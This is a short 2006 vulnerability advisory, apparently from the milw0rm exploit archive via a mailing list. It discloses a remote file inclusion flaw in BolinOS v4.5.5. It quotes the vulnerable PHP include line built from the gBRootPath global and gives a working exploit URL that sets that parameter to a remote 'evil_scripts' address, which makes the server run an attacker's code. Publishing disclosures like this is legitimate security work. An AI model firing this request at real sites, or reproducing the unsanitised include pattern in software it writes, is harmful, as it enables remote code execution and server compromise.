BolinOS v.4.5.5 <= (gBRootPath) Remote File Include Vulnerability

x0r0n Fri, 15 Sep 2006 16:00:54 -0700

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=


+

+BolinOS v.4.5.5 <= (gBRootPath) Remote File Include Vulnerability

+

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=

+

+Author: xoron (turkish hacker)

+

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=

+

+Class : Remote

+

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=

+

+Vuln Code: include 
($GLOBALS["gBRootPath"].$GLOBALS["gBSysPath"]."/system/_b/contentFiles/gBLib.php");

+

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=

+

+Exploit: http://www.site.com/[script 
path]/system/_b/contentFiles/gBIndex.php?gBRootPath=evil_scripts?

+

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=

+ Thanx : str0ke, Ironfist, Preddy, SHiKaA, mdx, gültekin, R3D4C!D, DaRK, 
insomnia, mirim, Dreamlord,

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=


# milw0rm.com [2006-09-15]

BolinOS v.4.5.5 <= (gBRootPath) Remote File Include Vulnerability

Reply via email to